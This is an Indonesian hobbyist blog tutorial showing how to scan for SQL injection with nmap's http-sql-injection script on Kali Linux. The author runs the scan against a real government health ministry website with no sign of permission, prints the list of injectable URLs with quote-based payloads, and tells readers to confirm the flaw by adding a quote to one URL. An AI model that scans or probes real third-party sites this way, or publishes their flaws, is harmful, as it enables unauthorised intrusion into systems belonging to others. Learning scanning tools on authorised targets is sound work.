Monday 14 March 2016

Scan vuln SQL Injection menggunakan NMAP di Linux


xixihi , malam fans .-. Nuenomaru disini.
Sesuai judulnya, kali ini gua bakal share Tutorial Scan vuln SQL Injection menggunakan NMAP di Linux , di tutorial ini Nue bakal praktekin di Kali Linux di leppy nue, silahkan di coba di Linux2 kesayangan anda.

lanjut tutorialnya

ketikan: 

nmap -sV --script=http-sql-injection www.target.com -Pn -p 80

keterangan :
-sV : untuk mendeteksi versi pada sistem operasi
--script : untuk memanggil script nmap yang akan di gunakan (untuk mencari script nmap yang lain nya ketik locate *.nse)
-Pn : untuk melewati proses identifikasi host yang sedang hidup (no ping)
-p : port yang digunakan

disini saya akan test situs http://www.depkes.go.id

ketikan:

nmap -sV --script=http-sql-injection www.depkes.go.id -Pn -p 80



Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-10 03:01 EST
Nmap scan report for www.depkes.go.id (202.70.136.4)
Host is up (0.026s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((Oracle))
|_http-server-header: Apache/2.2.15 (Oracle)
| http-sql-injection: 
|   Possible sqli for queries:
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/?pg=profil_kesehatan_provinsi%27%20OR%20sqlspider&act=page
|     http://www.depkes.go.id/pdf.php?id=a01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/?pg=profil_kesehatan_provinsi%27%20OR%20sqlspider&act=page
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/pdf.php?id=16030500001%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|_    http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 71.95 seconds



nah ternyata pada situs tersebut terdapat vulneralbility sql injection, untuk memastikan nya kita buka browser lalu copas salah satu link vuneralbility nya
contoh :

http://www.depkes.go.id/index.php?lg=LN01

tambahkan kutip pada akhir alamat url, dan ini hasil nya.




ini saya buat video nya juga cekidoot


Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

Salam para penjinak pinguin :v , Penunggang Naga,  Viva Real Tux Warrior Gaes :'v wkkwkwkw



bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Pentesting and suntikan awkkawaw.
Sekian dan semoga bermanfaat .. terimakasih

Aloo Gengs, sekarang waktunya Nue dan tim katakan Putus cabut dulu Gengs...
karna bsk udah Mulai Ujian Sekolah Gengs.. akawkwa
Bye..






source and thanks to: Forum BackBox Indonesia






./Nuenomaru





Topi kebelakang, Mata ku jauh Menatap KeDepan ;)




















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

3 comments

https://nmap.org/nsedoc/index.html itu scripnya bukan?


EmoticonEmoticon